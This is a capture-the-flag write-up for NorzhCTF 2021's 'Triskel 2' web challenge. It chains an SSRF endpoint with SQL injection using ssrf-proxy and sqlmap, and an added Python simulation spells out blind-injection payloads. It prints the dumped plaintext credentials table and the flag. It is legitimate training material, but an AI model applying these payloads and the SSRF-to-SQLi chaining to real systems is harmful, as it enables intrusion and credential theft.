NorzhCTF 2021: Triskel 2: Going in

Triskel 2: Going in

Category: Airport hall/web

[image: challenge description card]

20 points

What did you do? You shouldn’t have access to this chat, but you can’t do anything from it right?

by Remsio

Solution

This picks up right where I left off at the end of the Triskel 1 challenge.

There was one interesting thing in the source of the chat page: a search option (French: chercher).

[image: chat page source showing the search field]

A few SQL injection attempts returned 400 Bad Request, which reassured me that I was on the right track: the server was choking on the injected quotes rather than ignoring them.

I decided to automate the process. My choice was a combination of ssrf-proxy with sqlmap: ssrf-proxy wraps every request sqlmap makes into the SSRF parameter of the external API, so sqlmap can inject into the internal chat page as if it could reach it directly. Note that this was my first time using these tools.

I launched ssrf-proxy as below, with xxURLxx marking where the proxied URL is substituted. I set --rules=noproto to strip the http:// prefix from the injected URL, since call_api.php adds the scheme itself.

ssrf-proxy -u http://10.45.4.38:8100/api/call_api.php?api=xxURLxx --rules=noproto

Then I ran sqlmap through the proxy (ssrf-proxy listens on port 8081 by default) as below. The target is the internal chat host, not the public one; sqlmap can also be pointed at the proxy directly with --proxy=http://127.0.0.1:8081.

export ALL_PROXY=http://127.0.0.1:8081
sqlmap -u http://10.0.42.200/?search=% --dump
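To make explicit what ssrf-proxy and sqlmap are doing together here, the following is an added example (not the challenge's code and not the code of either tool): it simulates the chain offline with two small stand-in functions for call_api.php and the internal chat page, then extracts a password through the SSRF with a boolean-based blind injection, the way sqlmap would. The hostnames and parameter names follow the writeup; the vulnerable query, the table contents and the passwords are constructed assumptions.

```python
"""Offline simulation of the SSRF -> SQLi chain from the writeup.

Added example, not the challenge's code: call_api.php and the chat page
are stood in for by Python functions. Table contents are constructed.
"""
import sqlite3
import string
from urllib.parse import urlparse, parse_qs, urlencode, quote

SSRF_ENDPOINT = "http://10.45.4.38:8100/api/call_api.php"  # from the writeup
INTERNAL_HOST = "10.0.42.200"                               # from the writeup

# Constructed stand-in for the chat database (not the real rows).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE user_news (id INTEGER, password TEXT, username TEXT)")
_db.executemany("INSERT INTO user_news VALUES (?, ?, ?)", [
    (1, "Adm1n{P@ss}", "admin_richard_lauren"),
    (4, "JC44n24D6ej", "dev_leroy_bedart"),
])


def internal_app(url):
    """Stand-in for the chat page: concatenates ?search= straight into SQL (assumed)."""
    search = parse_qs(urlparse(url).query).get("search", [""])[0]
    sql = f"SELECT username FROM user_news WHERE username LIKE '%{search}%'"  # vulnerable
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        return 400, ""  # the 400 Bad Request the writeup saw on broken queries
    return 200, "\n".join(r[0] for r in rows)


def call_api(outer_url):
    """Stand-in for call_api.php?api=...: fetches whatever URL it is handed."""
    api = parse_qs(urlparse(outer_url).query).get("api", [""])[0]
    if "://" not in api:
        api = "http://" + api  # why --rules=noproto works: the server adds the scheme
    if urlparse(api).hostname != INTERNAL_HOST:
        return 404, ""  # only the internal chat host is simulated here
    return internal_app(api)


def build_ssrf_url(inner_url, noproto=True):
    """What ssrf-proxy does per request: wrap the inner URL into the api parameter."""
    if noproto and inner_url.startswith("http://"):
        inner_url = inner_url[len("http://"):]
    return f"{SSRF_ENDPOINT}?api={quote(inner_url, safe='')}"


def oracle(payload):
    """True when the injected condition holds (rows come back), else False."""
    inner = f"http://{INTERNAL_HOST}/?" + urlencode({"search": payload})
    status, body = call_api(build_ssrf_url(inner))
    return status == 200 and body != ""


# Quote and backslash are left out so the payload's own string literal stays intact.
CHARSET = "".join(c for c in string.printable if c not in "'\\" and not c.isspace())


def extract_password(username, max_len=64):
    """Boolean-based blind extraction through the SSRF, one character per position."""
    found = ""
    for pos in range(1, max_len + 1):
        for c in CHARSET:
            # '%' keeps the LIKE matching every row; the trailing comment eats the rest.
            payload = (f"%' AND substr((SELECT password FROM user_news "
                       f"WHERE username='{username}'),{pos},1)='{c}' -- ")
            if oracle(payload):
                found += c
                break
        else:
            return found  # no character matched: end of the password
    return found


if __name__ == "__main__":
    print(build_ssrf_url(f"http://{INTERNAL_HOST}/?search=%25"))
    print(extract_password("dev_leroy_bedart"))
```

The extraction loop is the part sqlmap automates; the point of the example is that every one of its requests reaches the internal host only because build_ssrf_url rewraps it into the api parameter, which is exactly the job ssrf-proxy did in the writeup.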

The interesting part of the output was the user_news table, which held plaintext credentials.

Database: db
Table: user_news
[6 entries]
+----+----------------------------+----------------------+
| id | password                   | username             |
+----+----------------------------+----------------------+
| 1  | D.!uTra+b+wrUVH5s?^AE3a~X  | admin_richard_lauren |
| 2  | X^UY6M=ohMA_ek3g{}Pm:mw:&A | admin_denis_valette  |
| 3  | 69PCrHE287Tavvg            | dev_arienne_dupuy    |
| 4  | JC44n24D6ejGKym            | dev_leroy_bedart     |
| 5  | FwX6Pk29x2uAz7S            | dev_pomeroy_dagenais |
| 6  | ypGk2ZtM7QRt343            | dev_denis_tetrault   |
+----+----------------------------+----------------------+

I logged in with the dev_leroy_bedart credentials on the http://10.45.4.38:8100/ website and found the flag on the Admin subpage.

[image: flag shown on the Admin subpage]

Flag

NORZH{Hidden_C0r0n4_ch4t_y0u_are_the_admin_now!:)}

luc © 2021